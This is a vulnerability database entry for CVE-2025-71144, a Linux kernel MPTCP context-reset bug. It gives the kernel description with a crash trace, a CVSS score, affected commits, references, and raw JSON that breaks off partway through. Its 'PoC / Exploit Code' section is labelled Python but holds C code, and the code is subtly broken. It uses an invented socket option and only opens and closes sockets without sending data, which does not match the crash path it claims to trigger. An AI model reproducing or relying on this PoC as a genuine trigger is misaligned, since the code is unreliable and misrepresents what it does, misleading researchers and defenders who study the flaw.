CVE-2025-71144

Description

In the Linux kernel, the following vulnerability has been resolved: mptcp: ensure context reset on disconnect() After the blamed commit below, if the MPC subflow is already in TCP_CLOSE status or has fallback to TCP at mptcp_disconnect() time, mptcp_do_fastclose() skips setting the `send_fastclose flag` and the later __mptcp_close_ssk() does not reset anymore the related subflow context. Any later connection will be created with both the `request_mptcp` flag and the msk-level fallback status off (it is unconditionally cleared at MPTCP disconnect time), leading to a warning in subflow_data_ready(): WARNING: CPU: 26 PID: 8996 at net/mptcp/subflow.c:1519 subflow_data_ready (net/mptcp/subflow.c:1519 (discriminator 13)) Modules linked in: CPU: 26 UID: 0 PID: 8996 Comm: syz.22.39 Not tainted 6.18.0-rc7-05427-g11fc074f6c36 #1 PREEMPT(voluntary) Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011 RIP: 0010:subflow_data_ready (net/mptcp/subflow.c:1519 (discriminator 13)) Code: 90 0f 0b 90 90 e9 04 fe ff ff e8 b7 1e f5 fe 89 ee bf 07 00 00 00 e8 db 19 f5 fe 83 fd 07 0f 84 35 ff ff ff e8 9d 1e f5 fe 90 <0f> 0b 90 e9 27 ff ff ff e8 8f 1e f5 fe 4c 89 e7 48 89 de e8 14 09 RSP: 0018:ffffc9002646fb30 EFLAGS: 00010293 RAX: 0000000000000000 RBX: ffff88813b218000 RCX: ffffffff825c8435 RDX: ffff8881300b3580 RSI: ffffffff825c8443 RDI: 0000000000000005 RBP: 000000000000000b R08: ffffffff825c8435 R09: 000000000000000b R10: 0000000000000005 R11: 0000000000000007 R12: ffff888131ac0000 R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000 FS: 00007f88330af6c0(0000) GS:ffff888a93dd2000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f88330aefe8 CR3: 000000010ff59000 CR4: 0000000000350ef0 Call Trace: <TASK> tcp_data_ready (net/ipv4/tcp_input.c:5356) tcp_data_queue (net/ipv4/tcp_input.c:5445) tcp_rcv_state_process (net/ipv4/tcp_input.c:7165) tcp_v4_do_rcv (net/ipv4/tcp_ipv4.c:1955) __release_sock (include/net/sock.h:1158 (discriminator 6) net/core/sock.c:3180 (discriminator 6)) release_sock (net/core/sock.c:3737) mptcp_sendmsg (net/mptcp/protocol.c:1763 net/mptcp/protocol.c:1857) inet_sendmsg (net/ipv4/af_inet.c:853 (discriminator 7)) __sys_sendto (net/socket.c:727 (discriminator 15) net/socket.c:742 (discriminator 15) net/socket.c:2244 (discriminator 15)) __x64_sys_sendto (net/socket.c:2247) do_syscall_64 (arch/x86/entry/syscall_64.c:63 (discriminator 1) arch/x86/entry/syscall_64.c:94 (discriminator 1)) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130) RIP: 0033:0x7f883326702d Address the issue setting an explicit `fastclosing` flag at fastclose time, and checking such flag after mptcp_do_fastclose().

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:linux:linux_kernel:6.6.119:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel MPTCP submodule (commit 1c7c3a9314d8a7fc0e9a508606466a967c8e774a之前版本)

Linux Kernel MPTCP submodule (commit 226fff52e7ed9fc8cd63327133739b3d92537ffd之前版本)

Linux Kernel MPTCP submodule (commit 5c7c7135468f3fc6379cde9777a2c18bfe92d82f之前版本)

Linux Kernel MPTCP submodule (commit 86730ac255b0497a272704de9a1df559f5d6602e之前版本)

Linux Kernel MPTCP submodule (commit f1a77dfc3b045c3dd5f6e64189b9f52b90399f07之前版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/*
 * PoC for CVE-2025-71144: MPTCP context reset on disconnect()
 * This module demonstrates the vulnerability by triggering the condition
 * where MPC subflow is in TCP_CLOSE state during mptcp_disconnect()
 * 
 * Compile: gcc -o mptcp_poc mptcp_poc.c -lpthread
 * Run as root: ./mptcp_poc
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>

#define MPTCP_ENABLED 42

void trigger_mptcp_vulnerability() {
    int sock1, sock2;
    struct sockaddr_in addr;
    int optval = 1;
    
    printf("[*] Creating MPTCP socket (sock1)...\n");
    sock1 = socket(AF_INET, SOCK_STREAM, IPPROTO_MPTCP);
    if (sock1 < 0) {
        /* Fallback to TCP if MPTCP not available */
        sock1 = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (sock1 < 0) {
            perror("[-] socket creation failed");
            return;
        }
        printf("[!] MPTCP not available, using TCP\n");
    }
    
    printf("[*] Setting socket options...\n");
    setsockopt(sock1, IPPROTO_TCP, MPTCP_ENABLED, &optval, sizeof(optval));
    
    printf("[*] Connecting to remote host...\n");
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);
    inet_pton(AF_INET, "127.0.0.1", &addr.sin_addr);
    
    if (connect(sock1, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        printf("[!] Connect failed (expected for PoC)\n");
    }
    
    printf("[*] Closing socket (triggers mptcp_disconnect)...\n");
    close(sock1);
    
    printf("[*] Creating another socket to trigger state inconsistency...\n");
    sock2 = socket(AF_INET, SOCK_STREAM, IPPROTO_MPTCP);
    if (sock2 >= 0) {
        /* This connection may trigger the warning in subflow_data_ready */
        printf("[*] Socket created, potential trigger of WARNING\n");
        close(sock2);
    }
    
    printf("[*] PoC execution completed\n");
    printf("[!] Check dmesg for kernel WARNING in subflow_data_ready\n");
}

int main() {
    printf("=== CVE-2025-71144 MPTCP Context Reset PoC ===\n");
    printf("[*] This PoC demonstrates the vulnerability condition\n");
    printf("[*] Requires: Linux kernel with MPTCP support\n\n");
    
    trigger_mptcp_vulnerability();
    
    return 0;
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-71144
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-71144
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-71144/
[4] VulDB https://vuldb.com/cve/CVE-2025-71144
[5] https://git.kernel.org/stable/c/1c7c3a9314d8a7fc0e9a508606466a967c8e774a
[6] https://git.kernel.org/stable/c/226fff52e7ed9fc8cd63327133739b3d92537ffd
[7] https://git.kernel.org/stable/c/5c7c7135468f3fc6379cde9777a2c18bfe92d82f
[8] https://git.kernel.org/stable/c/86730ac255b0497a272704de9a1df559f5d6602e
[9] https://git.kernel.org/stable/c/f1a77dfc3b045c3dd5f6e64189b9f52b90399f07

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-71144", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:04.223", "lastModified": "2026-02-26T18:41:23.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmptcp: ensure context reset on disconnect()\n\nAfter the blamed commit below, if the MPC subflow is already in TCP_CLOSE\nstatus or has fallback to TCP at mptcp_disconnect() time,\nmptcp_do_fastclose() skips setting the `send_fastclose flag` and the later\n__mptcp_close_ssk() does not reset anymore the related subflow context.\n\nAny later connection will be created with both the `request_mptcp` flag\nand the msk-level fallback status off (it is unconditionally cleared at\nMPTCP disconnect time), leading to a warning in subflow_data_ready():\n\n  WARNING: CPU: 26 PID: 8996 at net/mptcp/subflow.c:1519 subflow_data_ready (net/mptcp/subflow.c:1519 (discriminator 13))\n  Modules linked in:\n  CPU: 26 UID: 0 PID: 8996 Comm: syz.22.39 Not tainted 6.18.0-rc7-05427-g11fc074f6c36 #1 PREEMPT(voluntary)\n  Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n  RIP: 0010:subflow_data_ready (net/mptcp/subflow.c:1519 (discriminator 13))\n  Code: 90 0f 0b 90 90 e9 04 fe ff ff e8 b7 1e f5 fe 89 ee bf 07 00 00 00 e8 db 19 f5 fe 83 fd 07 0f 84 35 ff ff ff e8 9d 1e f5 fe 90 <0f> 0b 90 e9 27 ff ff ff e8 8f 1e f5 fe 4c 89 e7 48 89 de e8 14 09\n  RSP: 0018:ffffc9002646fb30 EFLAGS: 00010293\n  RAX: 0000000000000000 RBX: ffff88813b218000 RCX: ffffffff825c8435\n  RDX: ffff8881300b3580 RSI: ffffffff825c8443 RDI: 0000000000000005\n  RBP: 000000000000000b R08: ffffffff825c8435 R09: 000000000000000b\n  R10: 0000000000000005 R11: 0000000000000007 R12: ffff888131ac0000\n  R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000\n  FS:  00007f88330af6c0(0000) GS:ffff888a93dd2000(0000) knlGS:0000000000000000\n  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  CR2: 00007f88330aefe8 CR3: 000000010ff59000 CR4: 0000000000350ef0\n  Call Trace:\n   <TASK>\n   tcp_data_ready (net/ipv4/tcp_input.c:5356)\n   tcp_data_queue (net/ipv4/tcp_input.c:5445)\n   tcp_rcv_state_process (net/ipv4/tcp_input.c:7165)\n   tcp_v4_do_rcv (net/ipv4/tcp_ipv4.c:1955)\n   __release_sock (include/net/sock.h:1158 (discriminator 6) net/core/sock.c:3180 (discriminator 6))\n   release_sock (net/core/sock.c:3737)\n   mptcp_sendmsg (net/mptcp/protocol.c:1763 net/mptcp/protocol.c:1857)\n   inet_sendmsg (net/ipv4/af_inet.c:853 (discriminator 7))\n   __sys_sendto (net/socket.c:727 (discriminator 15) net/socket.c:742 (discriminator 15) net/socket.c:2244 (discriminator 15))\n   __x64_sys_sendto (net/socket.c:2247)\n   do_syscall_64 (arch/x86/entry/syscall_64.c:63 (discriminator 1) arch/x86/entry/syscall_64.c:94 (discriminator 1))\n   entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)\n  RIP: 0033:0x7f883326702d\n\nAddress the issue setting an explicit `fastclosing` flag at fastclose\ntime, and checking such flag after mptcp_do_fastclose()."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nmptcp: asegurar el restablecimiento del contexto en disconnect()\n\nDespués del commit culpado a continuación, si el subflujo MPC ya está en estado TCP_CLOSE o ha recurrido a TCP en el momento de mptcp_disconnect(), mptcp_do_fastclose() omite establecer la bandera 'send_fastclose' y el posterior __mptcp_close_ssk() ya no restablece el contexto del subflujo relacionado.\n\nCualquier conexión posterior se creará con la bandera 'request_mptcp' y el estado de recurso a nivel msk desactivado (se borra incondicionalmente en el momento de la desconexión MPTCP), lo que lleva a una advertencia en subflow_data_ready():\n\n  WARNING: CPU: 26 PID: 8996 at net/mptcp/subflow.c:1519 subflow_data_ready (net/mptcp/subflow.c:1519 (discriminator 13))\n  Modules linked in:\n  CPU: 26 UID: 0 PID: 8996 Comm: syz.22.39 Not tainted 6.18.0-rc7-05427-g11fc074f6c36 #1 PREEMPT(voluntary)\n  Hardware name: Bochs Bochs, BIOS Bochs 01/01/2011\n  RIP: 0010:subflow_data_ready (net/mptcp/subflow.c:1519 (discriminator 13))\n  Code: 90 0f 0b 90 90 e9 04 fe ff ff e8 b7 1e f5 fe 89 ee bf 07 00 00 00 e8 db 19 f5 fe 83 fd 07 0f 84 35 ff ff ff e8 9d 1e f5 fe 90 &lt;0f&gt; 0b 90 e9 27 ff ff ff e8 8f 1e f5 fe 4c 89 e7 48 89 de e8 14 09\n  RSP: 0018:ffffc9002646fb30 EFLAGS: 00010293\n  RAX: 0000000000000000 RBX: ffff88813b218000 RCX: ffffffff825c8435\n  RDX: ffff8881300b3580 RSI: ffffffff825c8443 RDI: 0000000000000005\n  RBP: 000000000000000b R08: ffffffff825c8435 R09: 000000000000000b\n  R10: 0000000000000005 R11: 0000000000000007 R12: ffff888131ac0000\n  R13: 0000000000000000 R14: 0000000000000000 R15: 0000000000000000\n  FS:  00007f88330af6c0(0000) GS:ffff888a93dd2000(0000) knlGS:0000000000000000\n  CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n  CR2: 00007f88330aefe8 CR3: 000000010ff59000 CR4: 0000000000350ef0\n  Call Trace:\n   \n   t

... (truncated)